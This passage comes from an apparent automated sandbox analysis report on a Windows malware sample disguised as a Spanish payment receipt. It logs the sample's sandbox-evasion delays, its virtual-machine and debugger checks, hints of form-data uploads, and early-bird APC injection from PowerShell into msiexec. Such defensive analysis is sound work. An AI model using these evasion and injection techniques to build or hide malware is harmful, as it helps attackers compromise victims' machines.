            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -596718s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -596603s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -596500s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -596390s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -596281s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -596171s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -596062s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -595953s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -595843s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -595734s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -595621s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -595515s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -595406s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -595296s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -595187s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -595078s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -594968s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -594859s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -594750s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140Thread sleep time: -594640s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeCode function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C13
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeCode function: 0_2_0040683D FindFirstFileW,FindClose,0_2_0040683D
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599344Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598797Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598250Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597922Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597812Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597703Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597593Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597484Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597375Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597265Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597047Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596828Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596718Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596603Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596500Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596390Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596281Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596171Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596062Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595843Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595621Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595515Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595296Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594968Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594750Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594640Jump to behavior
            Source: powershell.exe, 00000001.00000002.2053769821.0000000005180000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\^q
            Source: powershell.exe, 00000001.00000002.2053769821.0000000005180000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\^q
            Source: msiexec.exe, 00000006.00000002.2924097464.0000000005F27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWW
            Source: ModuleAnalysisCache.1.drBinary or memory string: Remove-NetEventVmNetworkAdapter
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021C07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd1f89892680e0<
            Source: Justificante pago-09453256434687.exe, 00000000.00000002.1740887264.00000000006B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
            Source: ModuleAnalysisCache.1.drBinary or memory string: Add-NetEventVmNetworkAdapter
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd1f5b7140c899<
            Source: msiexec.exe, 00000006.00000002.2924097464.0000000005F27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: msiexec.exe, 00000006.00000002.2924097464.0000000005ECA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
            Source: powershell.exe, 00000001.00000002.2053769821.0000000005180000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\^q
            Source: ModuleAnalysisCache.1.drBinary or memory string: Get-NetEventVmNetworkAdapter
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeAPI call chain: ExitProcess graph end nodegraph_0-3802
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeAPI call chain: ExitProcess graph end nodegraph_0-3806
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_009FF520 LdrInitializeThunk,LdrInitializeThunk,1_2_009FF520
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Early bird code injection technique detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 42E0000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
